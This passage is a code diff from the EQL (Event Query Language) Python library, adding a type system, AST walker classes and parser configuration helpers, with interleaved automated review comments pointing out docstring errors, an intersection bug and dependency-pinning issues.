'query': query_text + } + cls.query_cache[query_text] = parse_analytic(analytic_info) + return cls.query_cache[query_text] - def test_valid_analytics(self): - """Confirm that the analytics in JSON are valid.""" - self.get_example_queries() + @classmethod + def get_events(cls): + """Get output events from test_data.json.""" + if cls.__events is None: + with open(cls.events_file, "r") as f: + data = json.load(f) + cls.__events = [Event.from_data(d) for d in data] + return cls.__events @classmethod def get_example_queries(cls): """Get example queries with their expected 
outputs.""" - with open(cls.QUERIES_FILE, "r") as f: - queries = json.load(f) + with open(cls.queries_file, "r") as f: + queries = list(q for _, q in sorted(toml.load(f)["queries"].items())) for q in queries: analytic = cls.get_analytic(q['query']) analytic.metadata['_info'] = q.copy() q['analytic'] = analytic return [q for q in queries if cls.engine_name not in q.get('skip', [])] + @classmethod + def get_example_analytics(cls): + """Get a list of example analytics from test queries.""" + return [q["analytic"] for q in cls.get_example_queries()] + def validate_results(self, actual, expected, query=None): """Validate that a list of results matches.""" self.assertListEqual(actual, expected, "Got {} but expected {} for analytic {}".format(actual, expected, query)) - _events = None - - @classmethod - def get_events(cls): - """Get output events from test_data.json.""" - if cls._events is None: - - with open(cls.EVENTS_FILE, "r") as f: - data = json.load(f) - cls._events = [Event.from_data(d) for d in data] - return cls._events + def test_valid_analytics(self): + """Confirm that the analytics in JSON are valid.""" + self.get_example_queries() diff --git a/eql/engines/base.py b/eql/transpilers.py similarity index 64% rename from eql/engines/base.py rename to eql/transpilers.py index f13691a..1e6c31b 100644 --- a/eql/engines/base.py +++ b/eql/transpilers.py @@ -1,13 +1,8 @@ -"""Base class for constructing an analytic engine with analytics.""" -from collections import namedtuple - -from eql.ast import * # noqa -from eql.parser import parse_definitions -from eql.schema import EVENT_TYPE_GENERIC, use_schema -from eql.utils import is_string - - -DEFAULT_TIME_UNIT = 10000000 # Windows FileTime 0.1 microseconds +"""Core EQL functionality for query translation.""" +from .ast import PreProcessor, Field +from .parser import parse_definitions, ignore_missing_functions +from .utils import is_string, ParserConfig +from .walkers import ConfigurableWalker class NodeMethods(dict): 
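Review bot: `import toml` at the top of eql/tests/base.py is unconditional, but this module is now installed as the `eql.tests` package (see the `packages=` change in the setup.py hunk) while toml only appears in requirements_test.txt and the `loaders` extra, so `import eql.tests` raises ImportError on a plain install; eql/utils.py guards the same import with `try/except ImportError`, and the least invasive fix is to import toml inside `get_example_queries`, the only place it is used. The class-level `query_cache = {}` is shared by every subclass of `TestEngine`, which is only safe because `get_analytic` parses under `cls.schema` and all subclasses currently use the same `EMPTY_SCHEMA`; a subclass that overrides `schema` would receive analytics cached under a different schema, so either key the cache per class or leave a comment stating that assumption. The `__events` attribute is name-mangled to `_TestEngine__events`, which works from these classmethods but is invisible to subclasses; a single underscore would match the removed `_query_cache` convention.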
@@ -29,6 +24,18 @@ def decorator(f): return decorator + def replace(self, key): + """Add a callback method to the dictionary for a specific class. + + :param BaseNode key: The class of the object passed in + """ + def decorator(f): + """The function decorator that registers a method by node type.""" + self[key] = f + return f + + return decorator + def __call__(self, transpiler, node, *args, **kwargs): # type: (BaseTranspiler, BaseNode) -> object """Call the bound method for a node.""" cls = type(node) 
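Review bot: The docstring on the new `replace` method is a copy of the one on the method above it ("Add a callback method to the dictionary for a specific class") and does not say what distinguishes it from `add`, whose body is outside this hunk; the visible code simply does `self[key] = f`, overwriting any earlier registration. Suggest `"""Replace (or register) the callback for a node class, overriding any existing entry."""`, and if `add` is meant to reject duplicates, a one-line comment noting that `replace` is the deliberate override path. The enclosing `NodeMethods` class header is outside this hunk.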
@@ -39,39 +46,26 @@ def __call__(self, transpiler, node, *args, **kwargs): # type: (BaseTranspiler, return unbound(transpiler, node, *args, **kwargs) -class ConfigurableWalker(AstWalker): - """Subclass for adding configurations to an walkers.""" - - def __init__(self, config=None): - """Create the walker with optional configuration.""" - self.config = config or {} - self.stack = [] - self.schema = self.get_config('schema') - super(ConfigurableWalker, self).__init__() - - def get_config(self, name, default=None): - """Get a property from the config dict.""" - return self.config.get(name, default) - - class BaseTranspiler(ConfigurableWalker): """Base Transpiler class for converting ASTs from one language to another.""" - converters = NodeMethods() - renderers = NodeMethods() - def __init__(self, config=None): """Instantiate the transpiler.""" super(BaseTranspiler, self).__init__(config) self.config = config or {} self.stack = [] # type: list[BaseNode] - self._time_unit = self.get_config('time_unit', DEFAULT_TIME_UNIT) # type: int self._counter = 0 - def counter(self): + @staticmethod + def is_variable(node): # type: (EqlNode) -> bool + """Check if a node is a variable for a callback function.""" + return isinstance(node, Field) and not node.path + + def counter(self, reset=False): """Increment counter and get current value.""" - self._counter += 1 - return self._counter + current = 0 if reset else self._counter + self._counter = current + 1 + return current def push(self, node): # type: (BaseNode) -> None """Push node onto stack.""" 
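Review bot: `counter` now returns the value before incrementing (`current = 0 if reset else self._counter`, then `return current`), so the first call yields 0 where the removed implementation yielded 1, yet the docstring still reads "Increment counter and get current value"; update it to `"""Return the current counter value and then increment it (reset=True restarts at 0)."""` so callers that relied on 1-based numbering can see the change. In `__init__`, `self.config = config or {}` and `self.stack = []` are re-assigned immediately after `super(BaseTranspiler, self).__init__(config)`, which already sets both in `ConfigurableWalker.__init__` (walkers.py in this same commit); the two lines can be dropped, keeping the `# type:` comment elsewhere if it is still wanted. `is_variable` treats any `Field` with an empty `path` as a variable; a short comment saying that a bare field name denotes a callback variable by convention would make that rule explicit.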
@@ -87,21 +81,20 @@ def pop_many(self, count): # type: (int) -> list[BaseNode] self.stack[-count:] = [] return popped - def convert(self, node): # type: (BaseNode) -> BaseNode - """Convert an AST node with the registered converter functions.""" - return self.converters(self, node) - -class BaseEngine(ConfigurableWalker): +class BaseEngine(ConfigurableWalker, ParserConfig): """Add and render EQL analytics to the generic engines.""" def __init__(self, config=None): """Create the engine with an optional list of files.""" - super(BaseEngine, self).__init__(config) + ConfigurableWalker.__init__(self, config) self.analytics = [] # type: list[EqlAnalytic] self.preprocessor = PreProcessor() - with use_schema(self.schema): + # Set the context for `with engine:` syntax + ParserConfig.__init__(self, preprocessor=self.preprocessor, schema=self._schema) + + with self.schema: definitions = self.get_config('definitions', []) if is_string(definitions): definitions = parse_definitions(definitions) @@ -109,7 +102,8 @@ def __init__(self, config=None): self.preprocessor.add_definitions(definitions) for path in self.get_config('definitions_files', []): - with open(path, 'r') as f: + # skip missing function errors, because these are actually macros + with ignore_missing_functions, open(path, 'r') as f: definitions = parse_definitions(f.read()) self.preprocessor.add_definitions(definitions) @@ -125,7 +119,6 @@ def add_analytics(self, analytics): self.add_analytic(analytic) -# noinspection PyAbstractClass class TextEngine(BaseEngine): """Converter for EQL to a target language script.""" 
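Review bot: In the `@@ -109,7 +102,8 @@` hunk the definitions files are still opened with `open(path, 'r')` and no encoding, so macro files are decoded with the platform locale default; setup.py already uses `io.open(..., encoding='utf8')` and `stream_file_events` defaults to `encoding="utf8"`, so `with ignore_missing_functions, io.open(path, 'r', encoding='utf8') as f:` keeps the engine consistent across platforms and Python 2/3 (`io` needs importing in transpilers.py). The comment `# skip missing function errors, because these are actually macros` states the effect rather than the cause; `# names called in definitions files may be macros rather than functions, so missing-function errors are suppressed while parsing them` reads more clearly. `BaseEngine.__init__` continues outside this hunk.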
@@ -181,47 +174,9 @@ def render(self, analytics_only=False): return '\n'.join(output_lines) -class Event(namedtuple('Event', ['type', 'time', 'data'])): - """Event for python engine in EQL.""" - - @classmethod - def from_data(cls, data): - """Load an event from a dictionary. - - :param dict data: Dictionary with the event type, time, and keys. - """ - data = data.get('data_buffer', data) - timestamp = data.get('timestamp', 0) - - if is_string(data.get('event_type')): - event_type = data['event_type'] - elif 'event_type_full' in data: - event_type = data['event_type_full'] - if event_type.endswith('_event'): - event_type = event_type[:-len('_event')] - else: - event_type = EVENT_TYPE_GENERIC - - return cls(event_type, timestamp, data) - - def copy(self): - """Create a copy of the event.""" - data = self.data.copy() - return Event(self.type, self.time, data) - - def register_extension(ext): """Decorator used for registering TextEngines with specific file extensions building.""" def decorator(cls): TextEngine.extensions[ext] = cls return cls return decorator - - -class AnalyticOutput(namedtuple('AnalyticOutput', ['analytic_id', 'events'])): - """AnalyticOutput for python engine in EQL.""" - - @classmethod - def from_data(cls, events, analytic_id=None): # type: (list[dict], str) -> AnalyticOutput - """Load up an analytic output event.""" - return cls(analytic_id, [Event.from_data(e) for e in events]) diff --git a/eql/types.py b/eql/types.py new file mode 100644 index 0000000..f5b9861 --- /dev/null +++ b/eql/types.py 
@@ -0,0 +1,213 @@ +"""EQL type system.""" + +BASE_STRING = "string" +BASE_NUMBER = "number" +BASE_BOOLEAN = "boolean" +BASE_NULL = "null" +BASE_STRICT_PRIMITIVES = BASE_STRING, BASE_NUMBER, BASE_BOOLEAN +BASE_PRIMITIVES = BASE_STRING, BASE_NUMBER, BASE_BOOLEAN, BASE_NULL + +VARIABLE = "variable" + +LITERAL_SPECIFIER = "literal" +DYNAMIC_SPECIFIER = "dynamic" +NO_SPECIFIER = "none" +SPECIFIERS = (LITERAL_SPECIFIER, DYNAMIC_SPECIFIER, NO_SPECIFIER) + +STRING = NO_SPECIFIER, BASE_STRING +NUMBER = NO_SPECIFIER, BASE_NUMBER +BOOLEAN = NO_SPECIFIER, BASE_BOOLEAN +NULL = NO_SPECIFIER, BASE_NULL +PRIMITIVES = NO_SPECIFIER, BASE_PRIMITIVES + + +class Array(tuple): + """Array of nested types.""" + + def __repr__(self): + """Representation string of the object.""" + return type(self).__name__ + tuple.__repr__(self) + + +class Nested(tuple): + """Schema of nested types.""" + + def subschema(self, name): + """Get the subschema, given a subfield.""" + for (key, value) in self: + if name == key: + return value + + if not self: + return BASE_ALL + + def __repr__(self): + """Representation string of the object.""" + return type(self).__name__ + tuple.__repr__(self) + + +def split(type_hint): + """Split the specifier from the type hint.""" + if isinstance(type_hint, tuple) and len(type_hint) == 2: + if type_hint[0] in SPECIFIERS: + return type_hint + + # Create one if it's not present + return NO_SPECIFIER, type_hint + + +def get_specifier(type_hint): + """Get only the specifier from a type hint.""" + spec, _ = split(type_hint) + return spec + + +def get_type(type_hint): + """Get only the type portion of the type hint.""" + _, hint = split(type_hint) + return hint + + +def dynamic(type_hint=None): + """Make a type hint dynamic.""" + if type_hint is None: + return DYNAMIC_SPECIFIER, BASE_ALL + return DYNAMIC_SPECIFIER, get_type(type_hint) + + +def literal(type_hint=None): + """Make a type hint literal.""" + if type_hint is None: + return LITERAL_SPECIFIER, BASE_ALL + return 
LITERAL_SPECIFIER, get_type(type_hint) + + +def clear(type_hint=None): + """Make a type hint literal.""" + if type_hint is None: + return NO_SPECIFIER, BASE_ALL + return NO_SPECIFIER, get_type(type_hint) + + +# Create a union of all of the full types +ARRAY = NO_SPECIFIER, Array() +PRIMITIVE_ARRAY = NO_SPECIFIER, Array(BASE_PRIMITIVES) +BASE_ALL = (BASE_STRING, BASE_NUMBER, BASE_BOOLEAN, BASE_NULL, Array(), Nested()) +EXPRESSION = NO_SPECIFIER, BASE_ALL + + +def union_specifiers(*specifiers): + """Union multiple hints together.""" + if DYNAMIC_SPECIFIER in specifiers: + return DYNAMIC_SPECIFIER + + # literals can't be unioned with other literals + return NO_SPECIFIER + + +def _flatten(v): + if is_union(v): + for v1 in v: + for v2 in _flatten(v1): + yield v2 + else: + yield v + + +def union_types(*base_hints): + """Union multiple type hints together.""" + base_hints = tuple(set(v for v in _flatten(base_hints))) + + if len(base_hints) == 1: + return base_hints[0] + return base_hints + + +def intersect_types(*base_hints): + """Intersect multiple type hints together.""" + base_hints = tuple(set(v for v in _flatten(base_hints))) + + if len(base_hints) == 1: + return base_hints[0] + return base_hints + + +def union(*type_hints): + """Union multiple hints together.""" + specifiers, base_hints = zip(*map(split, type_hints)) + return union_specifiers(*specifiers), union_types(*base_hints) + + +def is_union(type_hint): + """Determine if a type hint is a union of multiple types.""" + return isinstance(type_hint, tuple) and not isinstance(type_hint, (Array, Nested)) + + +def is_dynamic(type_hint): + """Check if a type hint is dynamic.""" + return get_specifier(type_hint) == DYNAMIC_SPECIFIER + + +def is_literal(type_hint): + """Check if a type hint is dynamic.""" + return get_specifier(type_hint) == LITERAL_SPECIFIER + + +def check_specifiers(expected_specifier, actual_specifier): + """Check that specifiers are satisfied.""" + if expected_specifier == NO_SPECIFIER: + return 
True + return expected_specifier == actual_specifier + + +def check_full_hint(expected_hint, actual_hint): + """Check that specifiers and types match.""" + expected_spec, expected_type = split(expected_hint) + actual_spec, actual_type = split(actual_hint) + return check_specifiers(expected_spec, actual_spec) and check_types(expected_type, actual_type) + + +def check_types(expected_type, actual_type): + """Asymmetric check if a type can be matched against another.""" + expected_type = get_type(expected_type) + actual_type = get_type(actual_type) + status = _check_types(expected_type, actual_type) + + return status + + +def _check_types(expected_type, actual_type): + if expected_type is BASE_ALL or actual_type is BASE_ALL: + return True + + if is_union(expected_type): + return any(_check_types(exp, actual_type) for exp in expected_type) + + if is_union(actual_type): + return any(_check_types(expected_type, act) for act in actual_type) + + # For two arrays, check that there is an intersection between the two + if isinstance(expected_type, Array): + if not isinstance(actual_type, Array): + return False + elif len(expected_type) == 0 or len(actual_type) == 0: + return True + return _check_types(union_types(*expected_type), union_types(*actual_type)) + + if isinstance(expected_type, Nested): + if not isinstance(actual_type, Nested): + return False + elif len(expected_type) == 0 or len(actual_type) == 0: + return True + + keys1, _ = zip(*expected_type) + keys2, _ = zip(*actual_type) + matching_keys = set(keys1) ^ set(keys2) + + # If any of the schemas intersect, then they can be compared + for key in matching_keys: + if _check_types(expected_type.subschema(key), actual_type.subschema(key)): + return True + return False + + return expected_type == actual_type diff --git a/eql/utils.py b/eql/utils.py index 20ca93a..841f10c 100644 --- a/eql/utils.py +++ b/eql/utils.py 
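Review bot: In `_check_types`, `matching_keys = set(keys1) ^ set(keys2)` is the symmetric difference, so only keys present on one side are compared, which contradicts the comment `# If any of the schemas intersect, then they can be compared`; for a key that exists on one side only, `Nested.subschema` returns `None` (it only falls back to `BASE_ALL` for an empty schema), so two non-empty `Nested` hints with identical keys never match. The intended line is `matching_keys = set(keys1) & set(keys2)`. Separately, `clear`'s docstring says "Make a type hint literal" and `is_literal`'s says "Check if a type hint is dynamic" (both copied from their neighbours), `intersect_types` has the same body as `union_types`, and `union_types` builds its tuple from a `set`, so the element order of a multi-type union varies between interpreter runs under hash randomization — worth a comment if callers must never depend on that order.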
@@ -5,17 +5,10 @@ import json import os import sys +import threading -# Lazy load dynamic loaders -try: - import yaml -except ImportError: - yaml = None - -try: - import toml -except ImportError: - toml = None +PLUGIN_PREFIX = "eql_" +_loaded_plugins = False # Python2 and Python3 compatible type checking unicode_t = type(u"") @@ -34,14 +27,31 @@ numbers = int, float +# Optionally load dynamic loaders +try: + import yaml +except ImportError: + yaml = None + +try: + import toml +except ImportError: + toml = None + + def is_string(s): """Check if a python object is a unicode or ascii string.""" return isinstance(s, strings) -def is_number(s): +def is_number(n): """Check if a python object is a unicode or ascii string.""" - return isinstance(s, numbers) + return isinstance(n, numbers) + + +def is_array(a): + """Check if a number is array-like.""" + return isinstance(a, (list, tuple)) def str_presenter(dumper, data): @@ -140,17 +150,17 @@ def save_dump(contents, filename): def stream_json_lines(json_input): """Iterate over json lines to get Events.""" + decoder = json.JSONDecoder() for line in json_input: - line = line.strip() - if line.strip(): - yield json.loads(line) + if "{" in line: + yield decoder.decode(line) def stream_file_events(file_path, file_format=None, encoding="utf8"): """Stream a file as JSON. :param str file_path: Path to the file - :param str file_format: One of json.jgz, json.gz + :param str file_format: One of json/jsonl [.gz] :param str encoding: File encoding (ascii, utf8, utf16, etc.) """ gz_ext = '.gz' 
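Review bot: `is_number` keeps the docstring "Check if a python object is a unicode or ascii string" after its parameter rename in the `@@ -34,14 +27,31 @@` hunk, and the new `is_array` says "Check if a number is array-like"; suggest `"""Check if a python object is an int or float."""` and `"""Check if a python object is a list or tuple."""` respectively. The relocated `try: import yaml / except ImportError: yaml = None` blocks also swallow an ImportError raised from inside a broken yaml or toml install, not only a missing package; that was true before the move, but a comment saying the loaders are optional would make the intent clear.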
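Review bot: `stream_json_lines` now keeps a line only `if "{" in line`, so a line holding a JSON array, number or `null` is silently dropped instead of decoded (the removed code decoded every non-blank line), while a line that contains `{` but is not valid JSON still raises from `decoder.decode`. If skipping non-object lines is intended, state it in the docstring, e.g. `"""Iterate over json lines, yielding each object; lines without a JSON object are skipped."""`; otherwise `if line.strip():` preserves the previous behaviour while still avoiding empty lines.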
@@ -204,3 +214,135 @@ def stream_events(fileobj, file_format="json"): return json.load(fileobj) raise NotImplementedError("Unexpected format: {}".format(file_format)) + + +def is_stateful(query): + """Determine if a query requires any state tracking or if logic is atomic. + + :param ast.PipedQuery|ast.Analytic query: The parsed query AST to analyze + :rtype: bool + """ + # Resolve circular dependency for is_stateless + from . import ast # noqa: E402 + from . import pipes # noqa: E402 + + if not isinstance(query, ast.EqlNode): + raise TypeError("unsupported type {} to is_stateful. Expected {}".format(type(query), ast.EqlNode)) + + stateful_nodes = ( + ast.SubqueryBy, # join/sequence + ast.NamedSubquery, # child/descendant/event of + pipes.CountPipe, pipes.UniqueCountPipe, # pipes count/unique_count + + # some pipe combinations, such as "| sort field | head 5" are questionable + ) + + return any(isinstance(node, stateful_nodes) for node in query) + + +def match_kv(condition): + """Take a list of key value pairs and generate an EQL expression. + + :param dict condition: The source text query + :rtype: ast.Expression + """ + # Resolve circular dependency for match_kv + from . import ast # noqa: E402 + from .parser import parse_expression + + if not isinstance(condition, dict): + raise TypeError("unsupported type {} to match_kv. 
Expected {}".format(type(condition), ast.EqlNode)) + + and_node = ast.Boolean(True) + + for field_text, field_match in sorted(condition.items()): + if not isinstance(field_match, (list, tuple)): + field_match = [field_match] + + field_node = parse_expression(field_text) + if not isinstance(field_node, ast.Field): + raise TypeError("expected Field as key to dictionary, got {}".format(type(field_node).__name__)) + + exact = [] + wildcards = [] + for term in field_match: + literal = ast.Literal.from_python(term) # this may raise a TypeError + if isinstance(literal, ast.String) and "*" in literal.value: + wildcards.append(literal) + else: + exact.append(literal) + + match_node = ast.InSet(field_node, exact).optimize() + if wildcards: + match_node |= ast.FunctionCall("wildcard", [field_node] + wildcards) + and_node &= match_node + + return and_node + + +def load_extensions(force=False): + """Load EQL extensions.""" + global _loaded_plugins + + if force or not _loaded_plugins: + import pkgutil + import importlib + + _loaded_plugins = True + + for module_loader, name, ispkg in pkgutil.iter_modules(): + if name.startswith(PLUGIN_PREFIX): + importlib.import_module(name) + + +class ParserConfig(object): + """Context manager for handling parser configurations.""" + + __stacks = threading.local() + + def __init__(self, *managers, **config): + """Set the current status.""" + self.managers = managers + self.context = {k: v for k, v in config.items() if v is not None} + super(ParserConfig, self).__init__() + + @classmethod + def get_stack(cls, name): + """Get a stack and initialize it to empty.""" + return cls.__stacks.__dict__.setdefault(name, []) + + @classmethod + def push_stack(cls, name, value): + """Push a value onto a stack for the current thread.""" + cls.get_stack(name).append(value) + + @classmethod + def pop_stack(cls, name): + """Pop the last value of the thread.""" + return cls.get_stack(name).pop() + + @classmethod + def read_stack(cls, name, default=None, 
silent=True): + """Read the current value of the thread.""" + stack = cls.get_stack(name) + if silent and len(stack) == 0: + return default + return stack[-1] + + def __enter__(self): + """Enter a with statement.""" + for mgr in self.managers: + mgr.__enter__() + + for k, v in self.context.items(): + self.push_stack(k, v) + + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + """Pop from the stack.""" + for k in self.context: + self.pop_stack(k) + + for mgr in reversed(self.managers): + mgr.__exit__(exc_type, exc_val, exc_tb) diff --git a/eql/walkers.py b/eql/walkers.py new file mode 100644 index 0000000..f21f873 --- /dev/null +++ b/eql/walkers.py 
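Review bot: The `TypeError` in `match_kv` reports `Expected {}` formatted with `ast.EqlNode`, copied from `is_stateful`, but the check just above it is `isinstance(condition, dict)`; the message should name the type actually required, `raise TypeError("unsupported type {} to match_kv. Expected dict".format(type(condition)))`. `load_extensions` imports every module found by `pkgutil.iter_modules()` whose name starts with `eql_`, which runs that module's top-level code; the docstring `"""Load EQL extensions."""` should state this discovery rule and the `force` semantics so operators know that anything installed under that prefix on `sys.path` is executed when this is called. In `ParserConfig.__enter__`, if a later manager's `__enter__` raises, the managers already entered are never exited; `contextlib.ExitStack` would give that unwinding for free.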
@@ -0,0 +1,238 @@ +"""EQL walker classes.""" +import re +from collections import defaultdict, deque +from contextlib import contextmanager + +from .schema import Schema +from .utils import is_string, to_unicode + + +__all__ = ( + "Walker", + "RecursiveWalker", + "ConfigurableWalker", + "DepthFirstWalker", +) + + +DEFAULT_TIME_UNIT = 10000000 # Windows FileTime 0.1 microseconds + + +class Walker(object): + """Base class that provides functionality for walking abstract syntax trees of eql.BaseNode.""" + + __camelcache = {} + + def __init__(self): + """Create the AST walker.""" + object.__init__(self) + self._method_cache = defaultdict(dict) + self.event_stack = [] + self.in_pipes = [] + self.base_event_types = [] + self.node_stack = [] + + def register_func(self, node_cls, func, prefix="_walk_"): + """Register a callback function.""" + camelized = self.camelized(node_cls) + method_name = prefix + camelized + setattr(self, method_name, func) + + def iter_node(self, node): + """Iterate through a syntax tree.""" + if isinstance(node, BaseNode): + yield node + + for descendant in self.iter_node([v for v in node.iter_slots()]): + yield descendant + elif isinstance(node, (list, tuple)): + for n in node: + for descendant in self.iter_node(n): + yield descendant + elif isinstance(node, dict): + for n in self.iter_node(node.items()): + yield n + + @classmethod + def camelized(cls, node_cls): + """Get the camelized name for the class.""" + if is_string(node_cls): + class_name = node_cls + else: + if not isinstance(node_cls, type): + node_cls = type(node_cls) + class_name = node_cls.__name__ + if class_name not in cls.__camelcache: + pass1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', class_name) + pass2 = re.sub('([a-z0-9])([A-Z])', r'\1_\2', pass1) + cls.__camelcache[class_name] = to_unicode(pass2.lower()) + return cls.__camelcache[class_name] + + @property + def current_event_type(self): + """Get the active event type while walking.""" + if self.event_stack: + return 
self.event_stack[-1] + + def _enter(self, node): + self.event_stack.append(node.event_type) + + def _enter_event_query(self, node): + self.event_stack.append(node.event_type) + + def _enter_piped_query(self, node): # type: (PipedQuery) -> None + self.base_event_types = [] + if isinstance(node.first, EventQuery): + self.base_event_types.append(node.first.event_type) + else: + self.base_event_types.extend(q.query.event_type for q in node.first.queries) + + def _enter_pipe_command(self, node): + self.in_pipes = True + + def _enter_subquery_by(self, node): + self.event_stack.append(node.query.event_type) + + def _exit_subquery_by(self, node): + self.event_stack.pop() + + def _exit_event_query(self, node): + self.event_stack.pop() + + def _exit_piped_query(self, node): + self.base_event_types = [] + + def _exit_pipe_command(self, node): + self.in_pipes = False + + def _walk_default(self, node, *args, **kwargs): + return node + + def get_node_method(self, node_cls, prefix): # type: (BaseNode, str) -> callable + """Get the walk method for a node.""" + if not isinstance(node_cls, type): + node_cls = type(node_cls) + + if node_cls in self._method_cache[prefix]: + return self._method_cache[prefix][node_cls] + + queue = deque([node_cls]) + method = None + + while queue: + next_cls = queue.popleft() + method_name = prefix + self.camelized(next_cls) + method = getattr(self, method_name, None) + if callable(method): + break + + queue.extend(next_cls.__bases__) + + method = method or getattr(self, prefix + "default", None) + self._method_cache[prefix][node_cls] = method + return method + + def _walk_list(self, nodes, *args, **kwargs): + return [self.walk(n, *args, **kwargs) for n in nodes] + + def _walk_tuple(self, nodes, *args, **kwargs): + return tuple(self.walk(n, *args, **kwargs) for n in nodes) + + def _walk_dict(self, nodes, *args, **kwargs): + return dict({self.walk(k, *args, **kwargs): self.walk(v, *args, **kwargs) for k, v in nodes.items()}) + + @property + def 
active_node(self): + """Get the active context.""" + return self.node_stack[-1] + + @property + def parent_node(self): + """Get the parent context.""" + return self.node_stack[-2] + + @contextmanager + def set_context(self, node): + """Push a node onto the context stack.""" + enter_method = self.get_node_method(node, prefix="_enter_") + exit_method = self.get_node_method(node, prefix="_exit_") + + if callable(enter_method): + enter_method(node) + + self.node_stack.append(node) + + try: + yield node + finally: + self.node_stack.pop() + if callable(exit_method): + exit_method(node) + + def walk(self, node, *args, **kwargs): + """Walk the syntax tree top-down.""" + method = self.get_node_method(node, "_walk_") + if callable(method): + with self.set_context(node): + return method(node, *args, **kwargs) + + +class RecursiveWalker(Walker): + """Walker that will recursively walk and transform a tree.""" + + def _walk_base_node(self, node, *args, **kwargs): # type: (BaseNode) -> BaseNode + cls = type(node) + slots = [self.walk(v, *args, **kwargs) for k, v in node.iter_slots()] + return cls(*slots).optimize() + + def copy_node(self, node): + """Create a copy of a node.""" + return self.walk(node) + + +class DepthFirstWalker(Walker): + """Walk an AST bottom up.""" + + def walk(self, node, *args, **kwargs): + """Walk the syntax tree top-down.""" + method = self.get_node_method(node, "_walk_") + if callable(method): + with self.set_context(node): + if isinstance(node, BaseNode): + slots = [self.walk(v, *args, **kwargs) for name, v in node.iter_slots()] + node = type(node)(*slots) + return method(node, *args, **kwargs) + + def copy_node(self, node): + """Create a copy of a node.""" + return RecursiveWalker().walk(node) + + +class ConfigurableWalker(RecursiveWalker): + """Subclass for adding configurations to an walkers.""" + + def __init__(self, config=None): + """Create the walker with optional configuration.""" + self.config = config or {} + self.stack = [] + self.time_unit = 
self.get_config('time_unit', DEFAULT_TIME_UNIT) # type: int + self._schema = None + + if self.get_config('schema', None) is not None: + self._schema = Schema(**self.get_config('schema')) + super(ConfigurableWalker, self).__init__() + + @property + def schema(self): + """Get the current engine schema.""" + if self._schema is None: + return Schema.current() + return self._schema + + def get_config(self, name, default=None): + """Get a property from the config dict.""" + return self.config.get(name, default) + + +# circular dependency +from .ast import BaseNode, EventQuery # noqa: E402 diff --git a/requirements.txt b/requirements.txt index ba151ba..5ac1014 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,2 +1 @@ -TatSu~=4.2.6 -PyYAML~=3.13 +TatSu==4.2.6 diff --git a/requirements_test.txt b/requirements_test.txt index 06ec797..711d202 100644 --- a/requirements_test.txt +++ b/requirements_test.txt @@ -1,6 +1,8 @@ mock>=1.3.0 -pytest==3.8.2 +pytest~=3.8.2 pytest-cov~=2.4 -flake8==2.5.1 -pep257==0.7.0 -flake8-pep257==1.0.5 +flake8~=2.5.1 +pep257~=0.7.0 +flake8-pep257~=1.0.5 +PyYAML +toml~=0.10 \ No newline at end of file diff --git a/setup.cfg b/setup.cfg index f15eac5..9ede65e 100644 --- a/setup.cfg +++ b/setup.cfg @@ -3,10 +3,11 @@ universal = 1 [flake8] max-line-length = 120 -max-complexity = 20 +max-complexity = 23 +exclude = eql/_parsergen.py [pep257] ignore = D203 [tool:pytest] -#addopts = --cov=eql --cov-report term-missing --cov-report=xml +addopts = --cov=eql --cov-report term-missing --cov-report=xml --cov-report=html --junitxml=junit.xml -x -v diff --git a/setup.py b/setup.py index c02477f..487d919 100644 --- a/setup.py +++ b/setup.py 
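Review bot: `Walker.__init__` initialises `self.in_pipes = []`, but `_enter_pipe_command` and `_exit_pipe_command` assign `True` and `False`, so the attribute changes type during a walk; `self.in_pipes = False` in `__init__` matches its use as a flag. `DepthFirstWalker.walk` carries the docstring "Walk the syntax tree top-down" copied from `Walker.walk`, while the class docstring says "Walk an AST bottom up" and the body transforms the slots before calling the node's method; `"""Walk the syntax tree bottom-up: child slots are walked before the node's own method runs."""` resolves the contradiction. The bare `_enter(self, node)` method has no node-type suffix, so `get_node_method`, which looks up `"_enter_" + camelized(cls)` and falls back to `_enter_default`, never dispatches to it; it looks like a leftover and could be removed or renamed.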
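Review bot: `PyYAML` is added to requirements_test.txt without a version specifier while every other entry is pinned with `==` or `~=`, so the test environment will float across PyYAML major releases; give it a compatible-release pin like its neighbours (`PyYAML~=<version the tests are run against>`). The file also now ends without a trailing newline (`\ No newline at end of file`), which makes the next addition show up as a change to this line.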
@@ -12,20 +12,21 @@ except ImportError: # for pip <= 9.0.3 from pip.req import parse_requirements -from setuptools import setup, Command, find_packages +from setuptools import setup, Command from setuptools.command.test import test as TestCommand with io.open('eql/__init__.py', 'rt', encoding='utf8') as f: __version__ = re.search(r'__version__ = \'(.*?)\'', f.read()).group(1) - install_requires = parse_requirements('requirements.txt', session=False) install_requires = [str(req.req) for req in install_requires] test_requires = parse_requirements('requirements_test.txt', session=False) test_requires = [str(req.req) for req in test_requires] +etc_files = [os.path.relpath(fn, 'eql') for fn in glob.glob('eql/etc/*') if not fn.endswith('.py')] + class Lint(Command): """Wrapper for the standard linters.""" 
@@ -53,32 +54,45 @@ def run(self): class Test(TestCommand): """Use pytest (http://pytest.org/latest/) in place of the standard unittest library.""" + user_options = [("pytest-args=", "a", "Arguments to pass to pytest")] + def initialize_options(self): """Need to ensure pytest_args exists.""" TestCommand.initialize_options(self) self.pytest_args = [] - def finalize_options(self): - """Zero test_args and force test_suite to run.""" - TestCommand.finalize_options(self) - self.test_args = [ - '--cov-report=xml', '--cov-report=html', '--cov=eql', '--junitxml=junit.xml', '-x', '-v' - ] - self.test_suite = True - def run_tests(self): """Run pytest.""" import pytest - sys.exit(pytest.main(self.test_args)) + sys.exit(pytest.main(self.pytest_args)) -etc_files = [os.path.relpath(fn, 'eql') for fn in glob.glob('eql/etc/*') if not fn.endswith('.py')] - setup( name='eql', version=__version__, description='Event Query Language', install_requires=install_requires, + author='Endgame, Inc.', + author_email='eql@endgame.com', + license='AGPLv3', + classifiers=[ + 'Intended Audience :: Developers', + 'Intended Audience :: Information Technology', + 'Intended Audience :: Science/Research', + 'Intended Audience :: System Administrators', + 'Natural Language :: English', + 'Programming Language :: Python :: 2', + 'Programming Language :: Python :: 2.7', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', + 'Topic :: Database', + 'Topic :: Internet :: Log Analysis', + 'Topic :: Scientific/Engineering :: Information Analysis', + ], + url='https://eql.readthedocs.io', tests_require=test_requires, cmdclass={ 'lint': Lint, 
